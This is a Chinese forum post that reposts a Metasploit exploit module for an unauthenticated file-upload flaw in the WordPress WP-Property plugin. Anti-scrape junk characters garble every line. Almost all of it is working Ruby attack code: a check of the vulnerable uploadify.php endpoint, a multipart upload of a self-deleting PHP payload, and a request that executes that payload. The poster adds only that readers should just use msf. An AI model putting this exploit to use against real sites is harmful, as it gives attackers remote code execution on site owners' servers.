WordPress WP-Property PHP 文件上传漏洞) k; n% {: b) m& \) X
) b- J+ p: D/ p6 S ## # This file is part of the Metasploit Framework and may be subject to
% k9 F8 f9 R. Q0 ?: Y/ R" l& _5 _5 y' i$ i
# redistribution and commercial restrictions. Please see the Metasploit, ~$ @" ~7 }2 x% y" q* Q
% o+ n2 O1 C" H, V9 L$ l- B
# Framework web site for more information on licensing and terms of use.7 k) y, S4 h/ \5 q
8 E: Y; p0 L3 b. D- y
# http://metasploit.com/framework/ ##4 Q4 W2 `0 a- m/ _$ M
" e' G# P3 W4 [; |# v
p. \" A9 e9 c9 P' b1 Y6 l3 t% A0 N- K0 C2 m9 T
. a) P$ s# S/ R7 V2 o
. O( \3 q! @ T/ d4 d urequire 'msf/core'# Q. E) I: T' B2 d2 U
require 'msf/core/exploit/php_exe'- S" ~+ n1 P" V7 Y+ s
4 r) u" i% e! F: C; T- a, R
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',- p7 v" w9 ]' q5 _( e$ e
'Description' => %q{8 |) B" p; l4 ~
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>
9 |/ b _2 r& C4 x[, B1 S3 G- x0 D9 I
'Sammy FORGIT', # initial discovery; V/ z' S" L$ K1 F+ g# }/ _
'James Fitts <fitts.james[at]gmail.com>' # metasploit module
# F0 T9 H4 G0 t. d6 @],/ _% ^- T" u6 j, _4 Y
'License' => MSF_LICENSE,& s9 o5 l8 y) X% H' k
'References' =>; A v4 g) S; R+ n
[8 X$ D9 Y( |3 F8 Q3 K& G4 W( Q
[ 'OSVDB', '82656' ],, q& K2 R7 l. G2 e" \
[ 'BID', '53787' ],! o0 L, S1 N% P
[ 'EDB', '18987'],& d+ g# p, j# r
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]: `3 g! m7 O$ Q* d
],
$ n$ ^! r' l$ x2 }'Payload' =>
& y$ B/ ]0 [6 {8 l0 ^{
/ I w: u# B8 x: u'BadChars' => "\x00",
1 |, d+ J7 o6 Q},
% p+ W/ w8 v ?8 Y, T: u'Platform' => 'php',4 }5 n# I4 y. S2 l* r! ]# E8 [
'Arch' => ARCH_PHP,
) v0 m0 n/ i9 s) U1 b( h'Targets' =>
5 R/ U" J/ A8 {/ G1 `0 e V[, B7 i0 K6 R9 @8 ~( x4 i
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],; ]' j) e) X. ^
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]& c8 _. F" w8 o& W1 m' ^
],
' X: s* @" S+ S* Z, m1 Q F, \* f'DefaultTarget' => 0,
8 m$ E2 D/ k( ]. Q% Z'DisclosureDate' => 'Mar 26 2012'))
7 s& L y0 [( G
% Z( z) t% \( I/ ]register_options(# T% e+ s0 w8 U, y
[
n @% J; k. XOptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])& X( d* z) b; a5 p% J* Q6 D4 X; ?- \
], self.class)8 c, I* f/ j* C, k$ I$ \) H
end
, q2 }: w8 n# y5 l+ u5 d. D' T+ N/ W6 [! a( e! e' s5 O9 ~( D
def check
* [1 k# a% k3 Y7 X9 yuri = target_uri.path6 q) x: X' n4 F R4 m
uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
9 k+ S6 U$ O8 b( o/ c'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
9 D, J5 Q' ~( c4 W})
7 B; o# J5 S; v' @
* N% Z* u* c. @7 }7 o1 dif not res or res.code != 200
% `* h- l& p6 Z* P" Freturn Exploit::CheckCode::Unknown& N' T {, z) o1 H6 ]# z
end, q5 c/ ^- _4 S
! ]* H3 J8 ?4 O
return Exploit::CheckCode::Appears* b, `% L% v+ u
end
' z \0 ^( A& [( h$ F0 U3 k: ^. [# T* L5 c2 ^3 |' G1 _0 a
def exploit
4 o7 z' |; O4 a- U8 c' luri = target_uri.path
( v! s6 {8 v. h- puri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)
1 Q8 k1 a! h0 I% ]
& ~6 C! v% p4 s# X1 Y( hdata = Rex::MIME::Message.new6 e2 l+ I3 N7 |- l+ ]) m
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
+ Q2 Y% ?. P% q. c6 e: Tdata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")( t4 g$ b1 @" q; A* ], ]
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
. y# c; P# r* D& A& ]) h) M
% N4 [; G& J; \print_status("#{peer} - Uploading payload #{@payload_name}")! ~' s) r$ x$ O% C- j; I$ {
res = send_request_cgi({
+ r% D- ]; A3 @6 j& }- Y'method' => 'POST',
2 h6 L( w1 X T( k, U5 E& |' V$ a4 ~'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",1 H! V! K9 A& p
'ctype' => "multipart/form-data; boundary=#{data.bound}",, p7 K4 [ y7 ~. U) B# M r* ^
'data' => post_data! Q F) ]+ Q" g8 N
})7 Y" y9 P- n5 R& B5 ]
9 F8 e" K9 a( n/ M# R, {* Oif not res or res.code != 200 or res.body !~ /#{@payload_name}/8 D: I s* w) B$ m5 X7 e
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
* k# T2 Q% n' o @- y8 V+ Zend! X8 o$ @, R5 L& q
0 l s3 Q# Z2 ?- V" Y9 \
upload_uri = res.body) X; j( @& l* V- @6 d; t7 E: u
; {0 \6 I! G$ Z6 p/ R$ ?
print_status("#{peer} - Executing payload #{@payload_name}") L& h( u( Q, p4 M) H7 [
res = send_request_raw({9 X) i/ J. [4 g
'uri' => upload_uri,3 k/ M# f: z2 u% ~3 t- L2 j3 [6 c
'method' => 'GET'
& |/ g; Z$ E. S})6 K# s2 W I+ F S& h, [
end) e* }: g' a2 V# D
end J5 N$ s* _, H5 f1 A% M2 \: w
* n) f( s4 C c2 f不要问我这写的是什么 怎么利用 我是说msf.. i2 o L' C% R" o$ n' `# W& z
; S* y# ]9 C3 k+ C
|
发表于 2013-1-4 19:51:30
收藏
支持
反对